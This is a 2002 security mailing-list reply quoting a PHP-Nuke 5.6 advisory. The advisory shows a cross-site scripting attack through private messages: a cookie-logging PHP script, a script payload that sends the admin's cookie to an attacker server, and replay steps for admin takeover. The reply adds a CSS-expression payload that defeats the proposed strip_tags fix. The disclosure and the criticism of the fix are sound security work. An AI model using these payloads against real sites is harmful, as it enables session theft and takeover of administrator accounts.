Re: PHP-Nuke v5.6 - Users can compromise admin accts.

["Jelmer" <jelmer () kuperus xs4all nl>]

IMHO this whole email is just stating the obvious. On top of that the
proposed fix is flawed.

The PHP strip_tags function does not strip attributes so this is possible in
your proposed fix :

<a done=false STYLE="visibility : hidden; word-spacing : expression(
!(eval(this.done)) ? location.href='http://kuperus.xs4all.nl&apos; : 0 );
word-wrap : expression(this.done=true);"> test</a>

its a bit messy but gets the job done. It works by using css expressions  (a
feature afaik native to Internet explorer) in the style tag.

--
 jelmer

----- Original Message -----
From: "<-delusion->" <delusi0n () bellsouth net>
To: <bugtraq () securityfocus com>; <webappsec () secuirtyfocus com>
Sent: Thursday, August 15, 2002 10:30 AM
Subject: PHP-Nuke v5.6 - Users can compromise admin accts.


> Tested on PHP-Nuke v5.6 with Mozilla on Linux
> (should work on past versions and on most browsers)
>
>  Impact:
>  ---------------------------------------------
>  Allows any user to get admin access to a PHP-Nuke site.
>
> Summary:
> ----------------------------------------------
> Due to a XSS flaw in PHPNuke's Private Messaging module, users can send
> messages
> with html code that will be executed without any filtering. In old PHPNuke
> versions
> XSS allowed theft of cookies which stored passwords in base64
> encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before it
> encodes it
> into base64 and puts it into a cookie. This made stolen cookies useless if
> the attacker just
> tried decoding the base64 encrypted pass, because he just got the MD5
> encrypted pass.
>
> Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass
> with the
> encrypted one in the database, i was able to use the md5 encrypted pass i
> got from the
> stolen cookie to authenticate myself.
>
> PHPNuke sets cookies by base64 encoding a string that looks like this:
>
> username:md5_encrypted_pass:lang
>
> Since i can get the md5_encrypted pass all i have to do is launch a script
> that base64 encodes
> a string like the one above, and sets it as a cookie on my box.
>
> Exploit:
> -------------------------------------------------
> For this exploit to work, you must create the following files in your web
> server's directory.
>
> cookie.php containing this:
> <?
> $fp = fopen("cookie.txt","a");
> fputs($fp, $cookie);
> fclose($fp);
> print "Message Not Found!"; /* this is so the admin doesnt get scared. and
> thinks its some bug. */
> ?>
>
> test.php containing:
> <?
> $admin = base64_encode("decoded_string") ;
> setcookie("admin","$admin",time()+2592000);
> ?>
> You will find out what to replace decoded_string with..
>
> 1. Send an appealing private message to admin containing
<script>document.location.replace('http://yourserver/cookie.php?cookie='+doc
> ument.cookie);</script>
>
> 2. Wait awhile until the admin checks the message then check cookie.txt on
> yer server.
>
> 3. From cookie.txt.. copy the encrypted text after admin= and before the ;
>
> 4. go to http://www.isecurelabs.com/base64.php paste the copied text,
click
> decode it should give u a string like this:
> username:md5_encrypted_passwd:language (language may be blank).
>
> 5. paste the decoded string into test.php like so.
> <?
> $admin = base64_encode("paste decoded string here");
> setcookie("admin","$admin",time()+2592000);
> ?>
>
> 6. Login as any user on the site
>
> 7. send private message to self containing:
> <iframe src="http://yerserver/test.php";></iframe>
> Open the message and a cookie will now be set on yer box, but it will be
> configured with your server's URL.
> So all u gotta do is replace yer url wit the nuked site.
>
> 8. for mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/
> directory replace the url of yer server to the nuked site,
> for other browsers just find the Cookie from your server and edit it so
> instead of showng your url it shows the url
> of the nuked site.
>
> 9. restart yer browser (close and open up again). go back into the nuked
> site and you are now admin. :D
>
> Temp Solution:
> -------------------------------------------------
> Edit reply.php in /modules/Private_Messages/ and make $message be stripped
> of html tags.
>
> Go to line 75 in reply.php and add this line:
>
> $message = strip_tags($message, '<br><b><u><i>');
>
> That will remove any html tags that arent <br><b><u> or <i>. So it will
> prevent the XSS.
> -------------------------------------------------
> NOTE: I wasnt able to contact the php nuke person, i couldnt find an email
> on their site, and when i signed up for membership i never got the
password,
> so if u can, let them know asap so they can fix this.
>
> Another Vulnerability Brought to you  by,
> delusion
> http://digital-delusions.dyn.ee